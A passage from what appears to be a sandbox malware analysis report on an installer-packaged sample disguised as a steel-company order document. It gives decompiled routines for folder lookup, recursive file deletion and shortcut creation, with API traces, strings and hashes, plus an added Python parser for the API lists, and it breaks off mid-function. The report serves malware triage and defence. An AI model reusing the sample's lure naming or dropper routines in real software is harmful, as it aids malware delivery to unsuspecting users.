                                                							 *_t114 =  *_t89;
                                                							_t114 = _t114 + _t98;
                                                							_t89 = _t89 + _t98;
                                                						}
                                                						continue;
                                                					}
                                                					_t51 =  *((intOrPtr*)(_t89 + 1));
                                                					_t90 =  *_t89;
                                                					_v8 = _v8 + 2;
                                                					_t85 = _t90 & 0x000000ff;
                                                					_t52 = _t51 & 0x000000ff;
                                                					_a8 = (_t51 & 0x0000007f) << 0x00000007 | _t90 & 0x0000007f;
                                                					_v16 = _t52;
                                                					_t53 = _t52 | 0x00008000;
                                                					__eflags = _t109 - 2;
                                                					_v24 = _t85;
                                                					_v28 = _t85 | 0x00008000;
                                                					_v20 = _t53;
                                                					if(_t109 != 2) {
                                                						__eflags = _t109 - 3;
                                                						if(_t109 != 3) {
                                                							__eflags = _t109 - 1;
                                                							if(_t109 == 1) {
                                                								__eflags = (_t53 | 0xffffffff) - _a8;
                                                								E00406054(_t85, _t109, _t114, _t114, (_t53 | 0xffffffff) - _a8);
                                                							}
                                                							L42:
                                                							_t54 = lstrlenW(_t114);
                                                							_t89 = _v8;
                                                							_t114 =  &(_t114[_t54]);
                                                							_t49 = 0x7a69e0;
                                                							continue;
                                                						}
                                                						__eflags = _a8 - 0x1d;
                                                						if(_a8 != 0x1d) {
                                                							__eflags = (_a8 << 0xb) + 0x7a9000;
                                                							E00406032(_t114, (_a8 << 0xb) + 0x7a9000);
                                                						} else {
                                                							E00405F79(_t114,  *0x7a8a48);
                                                						}
                                                						__eflags = _a8 + 0xffffffeb - 7;
                                                						if(_a8 + 0xffffffeb < 7) {
                                                							L33:
                                                							E004062C6(_t114);
                                                						}
                                                						goto L42;
                                                					}
                                                					_t112 = 2;
                                                					_t66 = GetVersion();
                                                					__eflags = _t66;
                                                					if(_t66 >= 0) {
                                                						L13:
                                                						_a8 = 1;
                                                						L14:
                                                						__eflags =  *0x7a8ac4;
                                                						if( *0x7a8ac4 != 0) {
                                                							_t112 = 4;
                                                						}
                                                						__eflags = _t85;
                                                						if(_t85 >= 0) {
                                                							__eflags = _t85 - 0x25;
                                                							if(_t85 != 0x25) {
                                                								__eflags = _t85 - 0x24;
                                                								if(_t85 == 0x24) {
                                                									GetWindowsDirectoryW(_t114, 0x400);
                                                									_t112 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t112;
                                                									if(_t112 == 0) {
                                                										goto L30;
                                                									}
                                                									_t67 =  *0x7a8a44;
                                                									_t112 = _t112 - 1;
                                                									__eflags = _t67;
                                                									if(_t67 == 0) {
                                                										L26:
                                                										_t69 = SHGetSpecialFolderLocation( *0x7a8a48,  *(_t116 + _t112 * 4 - 0x18),  &_v12);
                                                										__eflags = _t69;
                                                										if(_t69 != 0) {
                                                											L28:
                                                											 *_t114 =  *_t114 & 0x00000000;
                                                											__eflags =  *_t114;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListW(_v12, _t114);
                                                										__imp__CoTaskMemFree(_v12);
                                                										__eflags = _t69;
                                                										if(_t69 != 0) {
                                                											goto L30;
                                                										}
                                                										goto L28;
                                                									}
                                                									__eflags = _a8;
                                                									if(_a8 == 0) {
                                                										goto L26;
                                                									}
                                                									_t71 =  *_t67( *0x7a8a48,  *(_t116 + _t112 * 4 - 0x18), 0, 0, _t114); // executed
                                                									__eflags = _t71;
                                                									if(_t71 == 0) {
                                                										goto L30;
                                                									}
                                                									goto L26;
                                                								}
                                                								goto L30;
                                                							}
                                                							GetSystemDirectoryW(_t114, 0x400);
                                                							goto L30;
                                                						} else {
                                                							_t87 = _t85 & 0x0000003f;
                                                							E00405EFF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a78 + (_t85 & 0x0000003f) * 2, _t114, _t85 & 0x00000040); // executed
                                                							__eflags =  *_t114;
                                                							if( *_t114 != 0) {
                                                								L31:
                                                								__eflags = _v16 - 0x1a;
                                                								if(_v16 == 0x1a) {
                                                									lstrcatW(_t114, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L33;
                                                							}
                                                							E00406054(_t87, _t112, _t114, _t114, _v16);
                                                							L30:
                                                							__eflags =  *_t114;
                                                							if( *_t114 == 0) {
                                                								goto L33;
                                                							}
                                                							goto L31;
                                                						}
                                                					}
                                                					__eflags = _t66 - 0x5a04;
                                                					if(_t66 == 0x5a04) {
                                                						goto L13;
                                                					}
                                                					__eflags = _v16 - 0x23;
                                                					if(_v16 == 0x23) {
                                                						goto L13;
                                                					}
                                                					__eflags = _v16 - 0x2e;
                                                					if(_v16 == 0x2e) {
                                                						goto L13;
                                                					} else {
                                                						_a8 = _a8 & 0x00000000;
                                                						goto L14;
                                                					}
                                                				}
                                                				 *_t114 =  *_t114 & 0x00000000;
                                                				if(_a4 == 0) {
                                                					return _t49;
                                                				}
                                                				return E00406032(_a4, _t49);
                                                			}

                                                (Per-line address column of the C-Code listing above, detached from the code during export: the function occupies 0x00406054-0x004062C3; the individual line addresses are omitted here.)

                                                APIs
                                                • GetVersion.KERNEL32(00000000,007A0F20,?,004051C8,007A0F20,00000000,00000000,007924F8), ref: 00406117
                                                • GetSystemDirectoryW.KERNEL32(ExecToStack,00000400), ref: 00406195
                                                • GetWindowsDirectoryW.KERNEL32(ExecToStack,00000400), ref: 004061A8
                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061E4
                                                • SHGetPathFromIDListW.SHELL32(?,ExecToStack), ref: 004061F2
                                                • CoTaskMemFree.OLE32(?), ref: 004061FD
                                                • lstrcatW.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 00406221
                                                • lstrlenW.KERNEL32(ExecToStack,00000000,007A0F20,?,004051C8,007A0F20,00000000,00000000,007924F8), ref: 0040627B
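                                                The API list above is the most compact behavioural summary of this function: each entry names the import, its module, the argument values the sandbox observed at the call (a resolved string such as ExecToStack, an 8-digit hex value, or ? when unknown) and the call-site address. The parser below is an added example and not part of the Joe Sandbox report; it turns such entries into structured records so that call order, per-module imports and the string arguments (here the Quick Launch path the function appends) can be extracted from many functions at once. The sample input is the eight lines printed above, copied into a constructed string, and the regular expression describes an assumed line shape that holds for those lines.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Assumed shape of one Joe Sandbox "APIs" entry (holds for the lines above):
#   • Api.MODULE(arg1,arg2,...), ref: <hex call-site address>
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Arguments the sandbox rendered as raw 8-digit hex values (pointers, sizes, return addresses).
HEX_ARG_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: tuple   # each argument exactly as the sandbox rendered it
    ref: int      # call-site virtual address


def parse_api_refs(text: str) -> List[ApiRef]:
    """Parse every line matching the API entry shape; lines of other kinds are skipped."""
    refs: List[ApiRef] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = tuple(raw_args.split(",")) if raw_args else ()
        refs.append(ApiRef(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return refs


def call_order(refs: List[ApiRef]) -> List[str]:
    """API names sorted by call-site address, i.e. the order they occur in the function body."""
    return [r.api for r in sorted(refs, key=lambda r: r.ref)]


def imports_by_module(refs: List[ApiRef]) -> Dict[str, List[str]]:
    """Module name -> sorted list of the distinct imports this function calls from it."""
    grouped: Dict[str, Set[str]] = {}
    for r in refs:
        grouped.setdefault(r.module, set()).add(r.api)
    return {mod: sorted(apis) for mod, apis in sorted(grouped.items())}


def string_args(refs: List[ApiRef]) -> Set[str]:
    """Arguments the sandbox resolved to a string: neither an 8-digit hex value nor '?'."""
    return {a for r in refs for a in r.args if a != "?" and not HEX_ARG_RE.match(a)}


# Constructed input: the API list printed above, copied verbatim (backslashes doubled for Python).
SAMPLE = """\
• GetVersion.KERNEL32(00000000,007A0F20,?,004051C8,007A0F20,00000000,00000000,007924F8), ref: 00406117
• GetSystemDirectoryW.KERNEL32(ExecToStack,00000400), ref: 00406195
• GetWindowsDirectoryW.KERNEL32(ExecToStack,00000400), ref: 004061A8
• SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061E4
• SHGetPathFromIDListW.SHELL32(?,ExecToStack), ref: 004061F2
• CoTaskMemFree.OLE32(?), ref: 004061FD
• lstrcatW.KERNEL32(ExecToStack,\\Microsoft\\Internet Explorer\\Quick Launch), ref: 00406221
• lstrlenW.KERNEL32(ExecToStack,00000000,007A0F20,?,004051C8,007A0F20,00000000,00000000,007924F8), ref: 0040627B
"""

if __name__ == "__main__":
    parsed = parse_api_refs(SAMPLE)
    for entry in sorted(parsed, key=lambda r: r.ref):
        print(f"{entry.ref:08x} {entry.module}!{entry.api}({', '.join(entry.args)})")
    print(imports_by_module(parsed))
    print(string_args(parsed))
```

Of the three helpers, `string_args` is the one worth keeping in a triage toolkit: the literal strings a function hands to imports (here the `\Microsoft\Internet Explorer\Quick Launch` suffix) are what an analyst pivots on across reports, while the hex values are addresses specific to one run.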
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: ExecToStack$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 900638850-4080303844
                                                • Opcode ID: 519102f416aae0167fe6a80eec88ce99d0a43be55d541feb02f87bd9ea180c8d
                                                • Instruction ID: 54f449c5e60a038f814dd9badb8d8d01ca624a198295cd2e3a2f801cab414967
                                                • Opcode Fuzzy Hash: 519102f416aae0167fe6a80eec88ce99d0a43be55d541feb02f87bd9ea180c8d
                                                • Instruction Fuzzy Hash: A3610271A00105ABDF20AF68CD40AAE37A4BF51314F12C17FE953BA2D1D67D8AA1CB4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph (rendered figure; the exported edge list is omitted)

                                                • Executed
                                                • Not Executed
                                                • Basic blocks of E00405823 span 0x405823-0x4059e3; the graph's call edges go to the internal routines 0x405aee, 0x406032, 0x405a32, 0x4057db, 0x405191, 0x405ed3, 0x406375, 0x4059e6 and 0x405823 (recursive), and to the imports DeleteFileW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW and FindClose.
                                                C-Code - Quality: 98%
                                                			E00405823(void* __eflags, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				short _v556;
                                                				short _v558;
                                                				struct _WIN32_FIND_DATAW _v604;
                                                				signed int _t38;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed char _t65;
                                                				WCHAR* _t66;
                                                				void* _t67;
                                                				WCHAR* _t68;
                                                				void* _t70;
                                                
                                                				_t65 = _a8;
                                                				_t68 = _a4;
                                                				_v8 = _t65 & 0x00000004;
                                                				_t38 = E00405AEE(__eflags, _t68);
                                                				_v12 = _t38;
                                                				if((_t65 & 0x00000008) != 0) {
                                                					_t62 = DeleteFileW(_t68); // executed
                                                					asm("sbb eax, eax");
                                                					_t64 =  ~_t62 + 1;
                                                					 *0x7a8ac8 =  *0x7a8ac8 + _t64;
                                                					return _t64;
                                                				}
                                                				_a4 = _t65;
                                                				_t8 =  &_a4;
                                                				 *_t8 = _a4 & 0x00000001;
                                                				__eflags =  *_t8;
                                                				if( *_t8 == 0) {
                                                					L5:
                                                					E00406032(0x7a3f48, _t68);
                                                					__eflags = _a4;
                                                					if(_a4 == 0) {
                                                						E00405A32(_t68);
                                                					} else {
                                                						lstrcatW(0x7a3f48, L"\\*.*");
                                                					}
                                                					__eflags =  *_t68;
                                                					if( *_t68 != 0) {
                                                						L10:
                                                						lstrcatW(_t68, 0x40a014);
                                                						L11:
                                                						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                						_t38 = FindFirstFileW(0x7a3f48,  &_v604);
                                                						_t70 = _t38;
                                                						__eflags = _t70 - 0xffffffff;
                                                						if(_t70 == 0xffffffff) {
                                                							L26:
                                                							__eflags = _a4;
                                                							if(_a4 != 0) {
                                                								_t30 = _t66 - 2;
                                                								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                								__eflags =  *_t30;
                                                							}
                                                							goto L28;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							__eflags = _v604.cFileName - 0x2e;
                                                							if(_v604.cFileName != 0x2e) {
                                                								L16:
                                                								E00406032(_t66,  &(_v604.cFileName));
                                                								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                								if(__eflags == 0) {
                                                									_t52 = E004057DB(__eflags, _t68, _v8);
                                                									__eflags = _t52;
                                                									if(_t52 != 0) {
                                                										E00405191(0xfffffff2, _t68);
                                                									} else {
                                                										__eflags = _v8 - _t52;
                                                										if(_v8 == _t52) {
                                                											 *0x7a8ac8 =  *0x7a8ac8 + 1;
                                                										} else {
                                                											E00405191(0xfffffff1, _t68);
                                                											E00405ED3(_t67, _t68, 0);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E00405823(__eflags, _t68, _a8);
                                                									}
                                                								}
                                                								goto L24;
                                                							}
                                                							__eflags = _v558;
                                                							if(_v558 == 0) {
                                                								goto L24;
                                                							}
                                                							__eflags = _v558 - 0x2e;
                                                							if(_v558 != 0x2e) {
                                                								goto L16;
                                                							}
                                                							__eflags = _v556;
                                                							if(_v556 == 0) {
                                                								goto L24;
                                                							}
                                                							goto L16;
                                                							L24:
                                                							_t55 = FindNextFileW(_t70,  &_v604);
                                                							__eflags = _t55;
                                                						} while (_t55 != 0);
                                                						_t38 = FindClose(_t70);
                                                						goto L26;
                                                					}
                                                					__eflags =  *0x7a3f48 - 0x5c;
                                                					if( *0x7a3f48 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t38;
                                                					if(_t38 == 0) {
                                                						L28:
                                                						__eflags = _a4;
                                                						if(_a4 == 0) {
                                                							L36:
                                                							return _t38;
                                                						}
                                                						__eflags = _v12;
                                                						if(_v12 != 0) {
                                                							_t38 = E00406375(_t68);
                                                							__eflags = _t38;
                                                							if(_t38 == 0) {
                                                								goto L36;
                                                							}
                                                							E004059E6(_t68);
                                                							_t38 = E004057DB(__eflags, _t68, _v8 | 0x00000001);
                                                							__eflags = _t38;
                                                							if(_t38 != 0) {
                                                								return E00405191(0xffffffe5, _t68);
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 == 0) {
                                                								goto L30;
                                                							}
                                                							E00405191(0xfffffff1, _t68);
                                                							return E00405ED3(_t67, _t68, 0);
                                                						}
                                                						L30:
                                                						 *0x7a8ac8 =  *0x7a8ac8 + 1;
                                                						return _t38;
                                                					}
                                                					__eflags = _t65 & 0x00000002;
                                                					if((_t65 & 0x00000002) == 0) {
                                                						goto L28;
                                                					}
                                                					goto L5;
                                                				}
                                                			}
                                                0x0040582d
                                                0x00405832
                                                0x0040583b
                                                0x0040583e
                                                0x00405846
                                                0x00405849
                                                0x0040584c
                                                0x00405854
                                                0x00405856
                                                0x00405857
                                                0x00000000
                                                0x00405857
                                                0x00405862
                                                0x00405865
                                                0x00405865
                                                0x00405865
                                                0x00405869
                                                0x0040587c
                                                0x00405883
                                                0x00405888
                                                0x0040588c
                                                0x0040589c
                                                0x0040588e
                                                0x00405894
                                                0x00405894
                                                0x004058a1
                                                0x004058a5
                                                0x004058b1
                                                0x004058b7
                                                0x004058bc
                                                0x004058c2
                                                0x004058cd
                                                0x004058d3
                                                0x004058d5
                                                0x004058d8
                                                0x00405982
                                                0x00405982
                                                0x00405986
                                                0x00405988
                                                0x00405988
                                                0x00405988
                                                0x00405988
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004058de
                                                0x004058de
                                                0x004058de
                                                0x004058e6
                                                0x00405906
                                                0x0040590e
                                                0x00405913
                                                0x0040591a
                                                0x00405935
                                                0x0040593a
                                                0x0040593c
                                                0x00405960
                                                0x0040593e
                                                0x0040593e
                                                0x00405941
                                                0x00405955
                                                0x00405943
                                                0x00405946
                                                0x0040594e
                                                0x0040594e
                                                0x00405941
                                                0x0040591c
                                                0x00405922
                                                0x00405924
                                                0x0040592a
                                                0x0040592a
                                                0x00405924
                                                0x00000000
                                                0x0040591a
                                                0x004058e8
                                                0x004058f0
                                                0x00000000
                                                0x00000000
                                                0x004058f2
                                                0x004058fa
                                                0x00000000
                                                0x00000000
                                                0x004058fc
                                                0x00405904
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405965
                                                0x0040596d
                                                0x00405973
                                                0x00405973
                                                0x0040597c
                                                0x00000000
                                                0x0040597c
                                                0x004058a7
                                                0x004058af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040586b
                                                0x0040586b
                                                0x0040586d
                                                0x0040598d
                                                0x0040598f
                                                0x00405992
                                                0x004059e3
                                                0x004059e3
                                                0x004059e3
                                                0x00405994
                                                0x00405997
                                                0x004059a2
                                                0x004059a7
                                                0x004059a9
                                                0x00000000
                                                0x00000000
                                                0x004059ac
                                                0x004059b8
                                                0x004059bd
                                                0x004059bf
                                                0x00000000
                                                0x004059da
                                                0x004059c1
                                                0x004059c4
                                                0x00000000
                                                0x00000000
                                                0x004059c9
                                                0x00000000
                                                0x004059d0
                                                0x00405999
                                                0x00405999
                                                0x00000000
                                                0x00405999
                                                0x00405873
                                                0x00405876
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405876

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 0040584C
                                                • lstrcatW.KERNEL32(007A3F48,\*.*), ref: 00405894
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 004058B7
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F48,?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 004058BD
                                                • FindFirstFileW.KERNEL32(007A3F48,?,?,?,0040A014,?,007A3F48,?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 004058CD
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 0040596D
                                                • FindClose.KERNEL32(00000000), ref: 0040597C
                                                Strings
                                                • "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 0040582C
                                                • H?z, xrefs: 0040587C
                                                • \*.*, xrefs: 0040588E
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405830
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$C:\Users\user~1\AppData\Local\Temp\$H?z$\*.*
                                                • API String ID: 2035342205-2937162007
                                                • Opcode ID: b12d6577bcbfee63c8f1005f00baa83bc0992cbcdb087d25710020cb5acef1ed
                                                • Instruction ID: 14cb3427b362c018eba3739e9bf11da3c0c9d0e64928a5d047ed163a808d7245
                                                • Opcode Fuzzy Hash: b12d6577bcbfee63c8f1005f00baa83bc0992cbcdb087d25710020cb5acef1ed
                                                • Instruction Fuzzy Hash: 5441C271800A14FACB21AB658C89BAF7778EF42724F24817BF801B11D1D77C4995DEAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406375(WCHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileW(_a4, 0x7a4f90); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x7a4f90;
                                                			}
                                                0x00406380
                                                0x00406389
                                                0x00000000
                                                0x00406396
                                                0x0040638c
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNELBASE(772EFAA0,007A4F90,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00405B37,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\), ref: 00406380
                                                • FindClose.KERNEL32(00000000), ref: 0040638C
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp, xrefs: 00406375
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp
                                                • API String ID: 2295610775-1732896309
                                                • Opcode ID: 8868b6a2426bb8f5e231bf1a7a7d8febf10f258da88ac185063839d851748521
                                                • Instruction ID: 3fb5690f441cb67cce8948cff85e4bd0b52f5f4d7afbd4cfaa78c2f4b78b622c
                                                • Opcode Fuzzy Hash: 8868b6a2426bb8f5e231bf1a7a7d8febf10f258da88ac185063839d851748521
                                                • Instruction Fuzzy Hash: BAD013715151205FC2505F746E0C44777545F463313154F35F45AF11E0C7745C5645EC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E00402095() {
                                                				signed int _t52;
                                                				void* _t56;
                                                				intOrPtr* _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr* _t62;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t68;
                                                				intOrPtr* _t70;
                                                				intOrPtr* _t72;
                                                				intOrPtr* _t74;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t78;
                                                				intOrPtr* _t80;
                                                				void* _t83;
                                                				intOrPtr* _t91;
                                                				signed int _t101;
                                                				signed int _t105;
                                                				void* _t107;
                                                
                                                				 *((intOrPtr*)(_t107 - 0x34)) = E00402BBF(0xfffffff0);
                                                				 *((intOrPtr*)(_t107 - 8)) = E00402BBF(0xffffffdf);
                                                				 *((intOrPtr*)(_t107 - 0xc)) = E00402BBF(2);
                                                				 *((intOrPtr*)(_t107 - 0x3c)) = E00402BBF(0xffffffcd);
                                                				 *((intOrPtr*)(_t107 - 0x10)) = E00402BBF(0x45);
                                                				_t52 =  *(_t107 - 0x1c);
                                                				 *(_t107 - 0x40) = _t52 & 0x00000fff;
                                                				_t101 = _t52 & 0x00008000;
                                                				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
                                                				if(E00405A5D( *((intOrPtr*)(_t107 - 8))) == 0) {
                                                					E00402BBF(0x21);
                                                				}
                                                				_t56 = _t107 + 8;
                                                				__imp__CoCreateInstance(0x40849c, _t83, 1, 0x40848c, _t56); // executed
                                                				if(_t56 < _t83) {
                                                					L14:
                                                					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ac, _t107 - 0x48);
                                                					 *((intOrPtr*)(_t107 - 0x14)) = _t61;
                                                					if(_t61 >= _t83) {
                                                						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)(_t107 - 0x14)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 8)));
                                                						if(_t101 == _t83) {
                                                							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate");
                                                						}
                                                						if(_t105 != _t83) {
                                                							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                						}
                                                						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
                                                						_t91 =  *((intOrPtr*)(_t107 - 0x3c));
                                                						if( *_t91 != _t83) {
                                                							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x40));
                                                						}
                                                						_t68 =  *((intOrPtr*)(_t107 + 8));
